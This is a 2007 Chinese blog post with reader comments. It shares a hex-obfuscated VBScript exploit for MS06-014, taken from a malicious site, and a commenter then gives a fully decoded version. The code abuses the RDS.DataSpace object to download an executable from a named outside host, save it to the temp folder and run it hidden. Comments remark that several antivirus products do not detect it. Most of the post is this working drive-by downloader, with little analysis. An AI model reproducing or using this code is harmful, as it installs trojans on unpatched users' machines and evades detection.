Submitted by 云舒 on 2007, February 5, 6:22 AM. 技术
无意中发现一段VBS代码,觉得蛮好玩的,发这里保存一下:

代码:

<script language="VBScript">
S="2020206F6E206572726F7220726573756D65206E6578740D0A737
3733D226D64622E657865220D0A61613D226F62220D0A6161613D22
6A65220D0A616161613D226374220D0A61616161613D22636C61220
D0A6161616161613D2273736964220D0A616161616161613D22636C
73220D0A61616161616161613D2269643A42443936220D0A6161616
161616161613D22433535362D3635220D0A61616161616161616161
3D2241332D313144220D0A61616161616161616161613D22302D393
8220D0A6161616161616161616161613D2233412D30304330344622
0D0A616161616161616161616161613D22433239453336220D0A6D6
D3D224D6963220D0A6E6E3D22726F73220D0A6D6D6E6E3D226F6674
2E58220D0A6E6E6D6D3D224D4C48220D0A6D6E6D6E3D22545450220
D0A6E6D3D6D6E0D0A62623D224164220D0A6262623D226F64220D0A
626262623D22622E5374220D0A62626262623D227265616D220D0A6
7673D2267220D0A65653D2265220D0A74743D2274220D0A63633D22
536372220D0A6363633D22697074220D0A636363633D22696E672E4
6220D0A6363313D22696C6553220D0A636363313D22797374220D0A
63636363313D22656D4F220D0A6363323D22626A220D0A636363323
D22656374220D0A68683D22536865220D0A6868683D226C6C2E4170
220D0A686868683D22706C69220D0A68686868683D2263617469220
D0A6868686868683D226F6E220D0A6F6F3D226F220D0A6F6F6F3D227
065220D0A6F6F6F6F3D226E220D0A536574207878787878787878203
D20646F63756D656E742E637265617465456C656D656E7428616126
6161612661616161290D0A78787878787878782E7365744174747269
62757465206161616161266161616161612C20616161616161612661
61616161616161266161616161616161612661616161616161616161
26616161616161616161616126616161616161616161616161266161
61616161616161616161610D0A53657420787878787878203D207878
7878787878782E4372656174654F626A656374286D6D266E6E266D6
D6E6E266E6E6D6D266D6E6D6E2C2222290D0A736574207878787820
3D2078787878787878782E6372656174656F626A6563742862622662
626226626262622662626262622C2222290D0A787878782E74797065
203D20310D0A7878787878782E4F70656E2067672665652674742C20
22687474703A2F2F71712E656532382E636E2F646F776E2F646F776E2
E657865222C2046616C73650D0A7878787878782E53656E640D0A78
7878787878783D7373730D0A20202020736574207878787878203D2
078787878787878782E6372656174656F626A6563742863632663636
32663636363266363312663636331266363636331266363322663636
3322C2222290D0A2020202073657420746D70203D2078787878782E
4765745370656369616C466F6C646572283229200D0A202020207878
78787878783D2078787878782E4275696C645061746828746D702C7
8787878787878290D0A20202020787878782E6F70656E0D0A2020202
0787878782E7772697465207878787878782E726573706F6E7365426
F64790D0A20202020787878782E73617665746F66696C65207878787
87878782C320D0A20202020787878782E636C6F73650D0A20202020
73657420717171203D2078787878787878782E6372656174656F626A
65637428686826686868266868686826686868686826686868686868
2C2222290D0A202020207171712E5368656C6C45786563757465207
87878787878782C22222C22222C6F6F266F6F6F266F6F6F6F2C30":D
="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMER
IC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEF
T(S,4)&N:S=MID(S,5)
LOOP:EXECUTE D

</script>


  评论

好像不能运行。汗
Post by banroo on 2007, February 5, 7:55 AM
你运行了?
这个是刚从一个恶意网站抓出来的MS06014的利用代码,如果没补丁会下载一个木马。
Post by 云舒 on 2007, February 5, 8:10 AM
呵呵~还双重加密呢~以为是老外的东西~原来是国产的~

on error resume next
sss="mdb.exe"
aa="ob"
aaa="je"
aaaa="ct"
aaaaa="cla"
aaaaaa="ssid"
aaaaaaa="cls"
aaaaaaaa="id:BD96"
aaaaaaaaa="C556-65"
aaaaaaaaaa="A3-11D"
aaaaaaaaaaa="0-98"
aaaaaaaaaaaa="3A-00C04F"
aaaaaaaaaaaaa="C29E36"
mm="Mic"
nn="ros"
mmnn="oft.X"
nnmm="MLH"
mnmn="TTP"
nm=mn
bb="Ad"
bbb="od"
bbbb="b.St"
bbbbb="ream"
gg="g"
ee="e"
tt="t"
cc="Scr"
ccc="ipt"
cccc="ing.F"
cc1="ileS"
ccc1="yst"
cccc1="emO"
cc2="bj"
ccc2="ect"
hh="She"
hhh="ll.Ap"
hhhh="pli"
hhhhh="cati"
hhhhhh="on"
oo="o"
ooo="pe"
oooo="n"
Set xxxxxxxx = document.createElement(aa&aaa&aaaa)
xxxxxxxx.setAttribute aaaaa&aaaaaa, aaaaaaa&aaaaaaaa&aaaaaaaaa&aaaaaaaaaa&aaaaaaaaaaa&aaaaaaaaaaaa&aaaaaaaaaaaaa
Set xxxxxx = xxxxxxxx.CreateObject(mm&nn&mmnn&nnmm&mnmn,"")
set xxxx = xxxxxxxx.createobject(bb&bbb&bbbb&bbbbb,"")
xxxx.type = 1
xxxxxx.Open gg&ee&tt, "http://qq.ee28.cn/down/down.exe", False
xxxxxx.Send
xxxxxxx=sss
set xxxxx = xxxxxxxx.createobject(cc&ccc&cccc&cc1&ccc1&cccc1&cc2&ccc2,"")
set tmp = xxxxx.GetSpecialFolder(2)
xxxxxxx= xxxxx.BuildPath(tmp,xxxxxxx)
xxxx.open
xxxx.write xxxxxx.responseBody
xxxx.savetofile xxxxxxx,2
xxxx.close
set qqq = xxxxxxxx.createobject(hh&hhh&hhhh&hhhhh&hhhhhh,"")
qqq.ShellExecute xxxxxxx,"","",oo&ooo&oooo,0
Post by 云舒姐姐 on 2007, February 5, 10:51 AM
哼!竟然敢取名字叫云舒姐姐!不想活了……

当然好玩才贴出来的~nod32也不杀的,不知道卡巴如何。
Post by 云舒 on 2007, February 5, 2:09 PM
编这个的人,也蛮累的。解剖学学的好。哈。
Post by 傲少 on 2007, February 6, 7:03 AM
呵呵,我是运行了。不过没有运行成功。
PS:我怕有问题,在虚拟机上照了张像后,才运行了。汗,白照了。
Post by banroo on 2007, February 6, 1:29 PM
我要学解密!
Post by banroo on 2007, February 6, 1:30 PM
脚本加密对付杀毒软件有意义,对于人来说一点意义也没有,解密太简单了。

混淆对于人来说是比较有效的方法。
Post by jno on 2007, February 11, 5:50 AM
德国的小红伞也不杀。。。没用卡巴测试。
Post by lovewaz on 2007, May 15, 4:19 PM